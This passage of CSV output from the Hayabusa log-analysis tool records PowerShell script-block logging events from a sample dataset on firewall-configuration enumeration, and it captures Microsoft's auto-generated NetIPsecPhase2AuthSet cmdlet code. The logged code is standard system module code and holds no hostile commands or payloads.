[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] $",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 